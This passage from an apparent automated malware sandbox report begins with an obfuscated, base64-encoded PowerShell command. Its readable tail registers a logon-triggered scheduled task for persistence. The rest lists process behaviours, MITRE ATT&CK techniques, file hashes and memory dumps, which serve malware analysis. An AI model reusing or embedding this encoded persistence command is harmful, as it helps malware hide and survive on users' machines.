1AEEARwBjAEEAZABBAEIAbwBBAEQAcwBBAEoAQQBCAGoAQQBHADAAQQBLAHcAQQA5AEEARABJAEEASwBRAEIANwBBAEMAUQBBAGUAZwBCADUAQQBIAFUAQQBXAHcAQQBrAEEARwBNAEEAYgBRAEEAdgBBAEQASQBBAFgAUQBBADkAQQBGAHMAQQBZAHcAQgB2AEEARwA0AEEAZABnAEIAbABBAEgASQBBAGQAQQBCAGQAQQBEAG8AQQBPAGcAQQBvAEEAQwBJAEEAVgBBAEIAdgBBAEUASQBBAEkAZwBBAHIAQQBDAEkAQQBlAFEAQgAwAEEARwBVAEEASQBnAEEAcABBAEMAZwBBAEoAQQBCADYAQQBHAFUAQQBiAEEAQQB1AEEARgBNAEEAZABRAEIAaQBBAEgATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBnAEEASgBBAEIAagBBAEcAMABBAEwAQQBBAHkAQQBDAGsAQQBMAEEAQQBvAEEARABJAEEASwBnAEEANABBAEMAawBBAEsAUQBCADkAQQBGAHMAQQBjAGcAQgBsAEEARwBZAEEAYgBBAEIAbABBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQB1AEEARwBFAEEAYwB3AEIAegBBAEcAVQBBAGIAUQBCAGkAQQBHAHcAQQBlAFEAQgBkAEEARABvAEEATwBnAEEAbwBBAEMASQBBAFQAQQBCAHYAQQBDAEkAQQBLAHcAQQBpAEEARwBFAEEAWgBBAEEAaQBBAEMAawBBAEsAQQBBAGsAQQBIAG8AQQBlAFEAQgAxAEEAQwBrAEEATwB3AEIAYgBBAEUAOABBAGMAQQBCAGwAQQBHADQAQQBYAFEAQQA2AEEARABvAEEASwBBAEEAaQBBAEYAUQBBAFoAUQBBAGkAQQBDAHMAQQBJAGcAQgB6AEEASABRAEEASQBnAEEAcABBAEMAZwBBAEsAUQBBADcAQQBEAFUAQQBOAGcAQQAwAEEARABnAEEATQBRAEEAMABBAEQATQBBAE0AUQBBADEAQQBEAHMAQQAiADsAJAB4AHEAegA9ACQAZQBuAHYAOgBVAFMARQBSAE4AQQBNAEUAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAJAB4AHEAegAgAC0ASQBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFACAAJABuAHgAIAAtAEEAcgAgACQAdgBtAHAAKQAgAC0AVAByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAIAAtAFUAIAAkAHgAcQB6ACkAKQA7ADgAMQA1ADkANwA3ADIANwA0ADsA
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2100

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
1e8a4d41720aa7d5772b80f649009b4b

SHA1
5247acd27875f5f8a2a1b82fd4bcb078436c14dc

SHA256
9ed4fb1bf31e23e6fd754358c14da5d46e8ae3d2c96bf5f78d362c76601d6c57

SHA512
ab5e57d265817b74cf472a4ba0e7181305fb638d753e9d91854d5fa7f9b90d2c5e38c79be1ccfddbf0f0297cedbe48af4d7d3a1ad67d8b894e2312477422f66f

Download Submit
memory/404-142-0x0000000007450000-0x0000000007ACA000-memory.dmp

Filesize
6.5MB

Download
memory/404-152-0x0000000008080000-0x0000000008624000-memory.dmp

Filesize
5.6MB

Download
memory/404-151-0x0000000006290000-0x00000000062B2000-memory.dmp

Filesize
136KB

Download
memory/404-143-0x00000000063A0000-0x00000000063BA000-memory.dmp

Filesize
104KB

Download
memory/1236-134-0x0000000004BF0000-0x0000000004C26000-memory.dmp

Filesize
216KB

Download
memory/1236-135-0x0000000005340000-0x0000000005968000-memory.dmp

Filesize
6.2MB

Download
memory/2100-147-0x0000000007570000-0x000000000757A000-memory.dmp

Filesize
40KB

Download
memory/2100-144-0x00000000071C0000-0x00000000071F2000-memory.dmp

Filesize
200KB

Download
memory/2100-145-0x00000000711A0000-0x00000000711EC000-memory.dmp

Filesize
304KB

Download
memory/2100-146-0x0000000007180000-0x000000000719E000-memory.dmp

Filesize
120KB

Download
memory/2100-148-0x0000000007790000-0x0000000007826000-memory.dmp

Filesize
600KB

Download
memory/5028-139-0x0000000005BB0000-0x0000000005BCE000-memory.dmp

Filesize
120KB

Download
memory/5028-137-0x0000000004E00000-0x0000000004E66000-memory.dmp

Filesize
408KB

Download
memory/5028-138-0x0000000004F70000-0x0000000004FD6000-memory.dmp

Filesize
408KB

Download
memory/5028-136-0x0000000004B40000-0x0000000004B62000-memory.dmp

Filesize
136KB

Download